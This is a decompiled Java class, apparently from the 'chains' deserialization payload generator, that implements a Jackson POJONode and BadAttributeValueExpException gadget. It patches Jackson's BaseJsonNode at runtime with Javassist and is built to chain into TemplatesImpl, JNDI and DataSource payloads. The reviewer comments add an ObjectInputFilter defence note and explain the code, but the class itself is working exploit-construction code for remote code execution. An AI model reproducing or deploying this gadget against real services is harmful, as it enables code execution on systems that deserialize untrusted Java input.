package com.ar3h.chains.gadget.impl.javanative.jackson;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import com.fasterxml.jackson.databind.node.POJONode;
import java.util.HashMap;
import javassist.ClassPool;
import javassist.CtClass;
import javax.management.BadAttributeValueExpException;
import org.apache.logging.log4j.core.jackson.JsonConstants;

/**
 * Gadget that wraps an inner payload object for Java-native serialization using
 * Jackson's {@link POJONode} and {@link BadAttributeValueExpException}.
 *
 * <p>The annotation's description gives the flow as
 * {@code BadAttributeValueExpException#readObject() => POJONode#toString() => getter}
 * and states that the getters of the wrapped object are called in no fixed order,
 * which is why it calls the chain unstable. The declared dependency is
 * {@code com.fasterxml.jackson.core:jackson-databind>2.9}.
 *
 * <p>Review note (defensive): a stream built by this class names
 * {@code java.util.HashMap}, {@code javax.management.BadAttributeValueExpException} and
 * {@code com.fasterxml.jackson.databind.node.POJONode}. An {@code ObjectInputFilter}
 * allow-list on any endpoint that accepts Java serialization rejects the latter two
 * before their {@code readObject} logic runs.
 *
 * <p>This listing is decompiler output (see the "loaded from" comment below), so local
 * names and some constant references are reconstructions rather than original source.
 */
@GadgetAnnotation(name = "Jackson反序列化链", description = "BadAttributeValueExpException#readObject() => POJONode#toString() => getter，会不定顺序调用对象*所有字段*中的getter方法\n此链不稳定，因为获取的顺序会有一定的不稳定性，有时 outputProperties 会在 stylesheetDOM 之前，这个时候反序列化攻击可以成功", dependencies = {"com.fasterxml.jackson.core:jackson-databind>2.9"}, priority = 15)
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.TemplatesImplWrapperChain, Tag.TemplatesImplChain, Tag.LdapAttributeChain, Tag.SignedObjectChain, Tag.MapMessageChain, Tag.DataSourceChains, Tag.DataSourceWrapperChain, "hutoolJndiDSFactory", "hutoolPooledDSFactory", "hutoolSimpleDSFactory"}, excludes = {Tag.NotForJackson})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jackson/Jackson.class */
public class Jackson implements Gadget {
    /**
     * Builds the object graph for this gadget around {@code obj}.
     *
     * @param obj the inner object; it is wrapped in a {@link POJONode} and is also used
     *            as the key of the returned map
     * @return a raw {@link HashMap} with a single entry mapping {@code obj} to the
     *         prepared {@link BadAttributeValueExpException}
     * @throws Exception declared by the signature; presumably raised by the reflective
     *                   field writes in {@code Reflections.setFieldValue} (helper not
     *                   visible here)
     */
    public Object getObject(Object obj) throws Exception {
        // The node is created before pre() runs, so the Jackson node classes are
        // already referenced by the time pre() edits BaseJsonNode.
        POJONode pOJONode = new POJONode(obj);
        pre();
        // Constructed with a null value; the real value is written reflectively below,
        // bypassing whatever the constructor would do with a non-null argument.
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException((Object) null);
        Reflections.setFieldValue(badAttributeValueExpException, "val", pOJONode);
        // The remaining Throwable state is blanked out (empty stack trace, no
        // suppressed exceptions, no cause).
        Reflections.setFieldValue(badAttributeValueExpException, "stackTrace", new StackTraceElement[0]);
        Reflections.setFieldValue(badAttributeValueExpException, "suppressedExceptions", null);
        // NOTE(review): JsonConstants.ELT_CAUSE is a log4j constant; presumably the
        // decompiler substituted it for the string literal "cause" (the Throwable
        // field name) because the values match. Confirm against the original source.
        Reflections.setFieldValue(badAttributeValueExpException, JsonConstants.ELT_CAUSE, null);
        // Raw HashMap as emitted by the decompiler; the exception is stored as the value.
        HashMap hashMap = new HashMap();
        hashMap.put(obj, badAttributeValueExpException);
        return hashMap;
    }

    /**
     * Gadget entry point: asks the chain for the next object and wraps it with
     * {@link #getObject(Object)}.
     *
     * @param gadgetContext context passed through to {@code gadgetChain.doCreate}
     * @param gadgetChain   chain that produces the inner object
     * @return the map returned by {@link #getObject(Object)}
     * @throws Exception propagated from {@code doCreate} or {@code getObject}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetChain.doCreate(gadgetContext));
    }

    /**
     * Uses Javassist to remove the {@code writeReplace} method from
     * {@code com.fasterxml.jackson.databind.node.BaseJsonNode} and to define the edited
     * class in two class loaders. The change applies only to class definitions inside the
     * JVM running this code.
     *
     * <p>NOTE(review): presumably this stops Java serialization from substituting a
     * replacement object for the node when the graph is written; the reason is not
     * stated in this file, so confirm. Every {@link Exception} is swallowed, so callers
     * cannot tell whether the edit took effect.
     */
    public void pre() {
        ClassPool classPool = ClassPool.getDefault();
        try {
            ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
            CtClass ctClass = classPool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
            ctClass.removeMethod(ctClass.getDeclaredMethod("writeReplace"));
            // First attempt: define the edited class in the thread context class loader.
            ctClass.toClass(contextClassLoader);
            // Second attempt: define it in the loader that owns the already-loaded
            // BaseJsonNode. This reuses the same CtClass after the first toClass call.
            ctClass.toClass(Class.forName("com.fasterxml.jackson.databind.node.BaseJsonNode").getClassLoader());
        } catch (Exception e) {
            // Deliberately empty in the decompiled code: any Exception from the steps
            // above is discarded without logging and getObject continues regardless.
        }
    }
}
